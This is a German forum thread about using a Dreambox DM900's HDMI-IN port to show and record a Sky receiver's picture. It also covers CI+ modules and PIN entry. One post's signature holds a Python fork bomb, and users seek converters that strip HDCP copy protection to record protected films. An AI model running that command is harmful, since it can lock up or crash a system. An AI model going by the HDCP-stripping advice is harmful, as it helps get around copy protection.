HDMI-IN

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • Hallo zusammen,

      die DM900 hat ja einen HDMI-IN Port, im Paketmanager befindet sich auch ein Paket ....enigma2-hdmi wo als Beschreibung "HDMI-IN" angegeben wird.
      Kann mir jemand sagen, was man damit anfangen kann?
      Kann ich hier einen anderen Receiver anschließen und dessen Bild über die Dream widergeben?


      Schönen Gruß

      Dreamborusse
    • Echt!?
      Das funktioniert?!
      Das wäre ja cool!
      Seitdem meine Karte bei einer der letzten Verlängerungen gepaired wurde, hab ich meinen Sky-Receiver (und fluche jedesmal, wenn ich nach dem Start, wieder die Uhrzeit einstellen muss, die sich schon mein VHS-Recorder in den 80ern über einen Power-Cycle hinweg merken konnte :cursing: :thumbdown: und der Sky-Mist befindet sich lediglich im Standby... Naja, Off-Topic) nur noch zum Fußball gucken benutzt (ich weiß meine PIN gar nicht (mehr)).
      Das wäre ja eine Möglichkeit mein Vollabo wieder mal vernünftig zu nutzen...
      Kann man darüber auch irgendwie die Jugendschutz-PIN automatisch eingeben (wahrscheinlich nicht, aber man kann ja mal hoffen)?

      Wie funktioniert das denn dann mit der Aufnahme?

      Vielen Dank im Voraus

      Dreamborusse

      The post was edited 1 time, last by Dreamborusse ().

    • Momentan funktioniert es nicht bzw teilweise man bekommt ein bild von der quelle das skaliert in der linken oberen ecke ist und mir ist noch keine möglichkeit bekannt das bild auf den ganzen schirm zu bekommen.Das plugin auf dem feed ist noch unverändert da seht ihr noch nichts sobald sich was ändert passe ich das an.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • @Mausi
      ...ich hab eh noch keinen UHD Fernseher (die einigermaßen erschwinglichen Fernseher sind mir noch zu klein).
      Kann man dann über das SKY CI Modul auch aufnehmen?
      Ich hab schon gelesen, dass man wohl die PIN automatisch eingeben lassen kann, das finde ich schon unerträglich beim SKY Receiver, wenn es ja nur ein mal am Tag wäre, aber bei jedem Umschalten und bei jeder Sendung.
      Egal, die Nachteile sind ja hier allen bekannt, sonst würden nicht so viele Anstrengungen unternommen, die Sky Hardware zu umgehen...
      Weißt Du zufällig, ob man seinen Receiver gegen ein Modul tauschen kann und ob sich dann das Abo verlängert?

      Danbke im Voraus!

      Dreamborusse
    • bei mir funktioniert das bisher nur auf SKY-Sport. Ich bin im Moment dabei einen Ligawo-Converter zu ordern, der das HDMI Signal unverschüsselt (HDCP) ausgibt, so das ich dann auch Movies aufnehmen kann.

      In das Modul von SKY setze ich wenig Hoffnung, auch da ich eine zweit Karte vom Nachbarn verwende, die ja dann mit den Inet verbunden werden muss. Das geht ja mit dem Modul nicht.
    • Vielen Dank für die Infos!
      Klingt jedenfalls sehr interessant!

      @MKL: Funktioniert das CI Modul nicht, wenn es nicht "nach Hause telefoniert"? Also mein Sky Receiver ist nicht am Netz angeschlossen. Dauert halt bei Updates länger, wenn er die Daten über den Satelliten herunterläd statt übers Netz. Gibt es Unterschiede zwischen den Modulen und somit irgendetwas, was empfehlenswert ist? Ich meine nur gelesen zu haben, dass die Zweitkarte bei Sky billiger wird, wenn man beide Receiver ins Internet einbindet, aber nicht, dass es nicht funktioniert. Was das soll, weiß ich auch nicht so recht, schließlich gibt es VPN... :denk:

      Beste Grüße

      Dreamborusse
    • @gutemine: Ah, verstehe, ok! Da ich keine Zweitkarte brauche, wäre das eine gute Option... Klingt ja, als würde es schon gut funktionieren... "nicht zwei Sender gleichzeit", heißt das auch, dass man nicht gleichzeitig mit der HD+ Karte im Boxschacht oder FTA Sender empfangen kann, schließlich hat die DM900 2 Tuner?!?!
    • ...da ich brav mein Abo bezahle und auch sonst nichts illegales mache, kann ich das durchaus mit meinem Gewissen vereinbaren.
      Wenn Sky nicht willens ist, vernünftige Hardware zu liefern, muss man eben schauen, wie man sich behelfen kann.
      Sky Go läuft schon ewig auf meinem FireTV und ich hab vielleicht in Summe in den letzten Monaten 5h geguckt (wobei in den letzten drei, nicht mehr als 1h), ich gehe daher davon aus, dass mich Sky gar nicht mit 24x7 bestrafen (oder locken) kann! 8)
      ...selbst als meine Karte noch nicht gepaired war, hab ich nur hin und wieder mal einen Film aufgenommen und nur welche, die mich auch interessieren, somit wird mein NAS noch eine Weile brauchen, bis es voll ist (meistens ist (zumindest gefühlt) die Auflösung bei den Öffentlich-Rechtlichen eh besser).
      Ich bin kein Jurist, aber ich habe die Diskussionen in den letzten Jahren immer mal wieder verfolgt und die "Illegalität" ist, glaube ich, immer noch nicht ausdiskutiert (gegen AGBs zu verstoßen, bedeutet ja noch lange nicht, gegen das BGB zu vertoßen...).

      Klingt zumindest so, als könnte ich den Stapel der unterschiedlichen Receiver im Wohnzimmer ein wenig reduzieren (meine Frau wirds freuen!)...

      Vielen Dank für die erfreulichen Infos und Gute Nacht!

      :)
    • @Dreamborusse

      ich suche noch einen Converter, der HDCP entfernt, so das ich auch Movies vom S-Schrott aufnehmen kann. Es ist ausser Sport alles gesperrt bei den Spinnern, HD+ muss unbedingt geschützt werden. Kleiner Spaß.

      Angeblich soll das mit bestimmten Convertern funktionieren, nur wüsste ich gerne mit welchem.
      Ich habe hier einen Noname-Splitter 1-2 mit dem es nicht funktioniert.

      Vielleicht hat jemand einen Tip..
    • @MKL: Wenn zumindest Sport (auch Buli?) nicht HDCP geschützt ist, könnte ich das ja schonmal ohne Splitter ausprobieren (seit fast einem Jahr, dient der höllenschlechte Himmelsreceiver ohnehin nur zur Darstellung von Fußball). Das einzig blöde ist, dass ich dann trotzdem immer wieder die Zeit neu einstellen muss am Receiver und hin und wieder eine Taste drücken, damit er nicht kurz vor Spielende das Gerät herunterfahren will (völlig bescheuerte Interpretation der Ecodesign Directive).

      Ich schätze, über kurz oder lang, muss wohl ein CI+ Modul her...

      Beste Grüße

      Dreamborusse